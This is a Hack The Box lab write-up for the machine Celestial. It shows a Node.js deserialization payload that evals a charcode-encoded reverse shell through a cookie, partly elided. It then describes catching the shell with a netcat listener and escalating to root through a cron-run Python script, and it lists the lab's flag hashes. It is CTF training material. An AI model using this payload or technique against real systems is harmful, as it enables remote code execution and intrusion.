Hacking
GithubTwitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
PurpleSharp
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By GitBook
Celestial

Celestial - 10.10.10.85

Target Enumeration:

OS: Linux
IP: 10.10.10.85
User: 9a093cd22ce86b7f41db4116e80d0b0f
Root: ba1d0019200a54e370ca151007a8095a

Ports / Services / Software Versions Running

3000/tcp open http Node.js Express framework

Vulnerability Exploited:

Nodejs Deserialization bug

Privilege Escalation:

Python script running as root in the users documents folder

Exploiting the host:

Nmap
Visiting in browser:
Decoding the cookie gives you:
Checking for vulnerabilities in node.js we found
Download nodejsshell.py and run
Copy this to a file and modify to replicate this whole string as per the guide on the link:
{"rce":"_$ND_FUNC$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,--SNIP-6,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
Encode this in base64 and replace the cookie.
Set up a nc listener on 443 and send the request
Your listener will now spawn a shell.
Located in the documents folder is script.py
This appears to run every 5 mins and overwrites itself so you are unable to inject a reverse python shell without it breaking. Also found is output.txt.
This holds the output from the script.py and while we have not found a crontab for root we can assume that it will execute every 5 minutes what ever is in the script.py file as the root user as it overwrites output.txt.
So append to the end of the file:
And set up a listener on 444 and wait around 5 minutes to get the root shell.
Checking roots crontab shows that they are overwriting the file every 5 minutes
Hack The Box last updated - 2019 - Previous
Poison
Next - Hack The Box last updated - 2019
Waldo
Last modified 3yr ago
Copy link
Outline
Celestial - 10.10.10.85
Target Enumeration:
Ports / Services / Software Versions Running
Vulnerability Exploited:
Privilege Escalation:
Exploiting the host: